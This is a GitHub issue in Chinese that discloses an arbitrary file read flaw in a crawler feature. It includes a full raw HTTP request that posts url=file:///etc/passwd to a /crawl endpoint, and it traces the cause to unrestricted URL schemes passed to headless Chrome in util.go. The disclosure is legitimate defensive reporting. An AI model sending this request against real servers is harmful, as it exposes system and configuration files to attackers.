Skip to content

存在任意文件读取漏洞 #175

New issue
New issue
Open
Open
存在任意文件读取漏洞#175
@kaliworld

Description

@kaliworld
kaliworld
opened on Nov 24, 2025

此漏洞在编辑模式,爬虫强力模式中,影响包括v2.12之前的版本

Image

构造恶意的链接即可读取文件

Image

请求和响应数据包:

Image

原始请求包:

POST /crawl HTTP/1.1
Host: localhost:8181
Content-Length: 57
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8181
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8181/api/test/edit/blank
Accept-Encoding: gzip, deflate, br
Cookie: bookstack=15c2b43f5cb53a04d6ae9737b884f845; login=P_-HAwEBDkNvb2tpZVJlbWVtYmVyAf-IAAEDAQhNZW1iZXJJZAEEAAEHQWNjb3VudAEMAAEEVGltZQH_hAAAABD_gwUBAQRUaW1lAf-EAAAAHP-IAQQBBHRlc3QBDwEAAAAO4LSkpC8mBO7-1AA=|1763880356791069263|8cfa193d2381ab70205ab44a2e28a10d773434aa
Connection: keep-alive



url=file:///etc/passwd&force=1&intelligence=0&diy=&type=2

代码分析,问题出在util.go组件中,CrawlByChrome函数直接拼接,未能限制浏览器协议,直接在args = []string{"--headless", "--disable-gpu", "--dump-dom", "--no-sandbox", urlStr} 拼接urlStr:

Image

危害:

该漏洞允许攻击者在未授权的情况下读取服务器上的任意文件,包括敏感配置文件、源代码、日志及可能含有机密信息的系统文件。

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions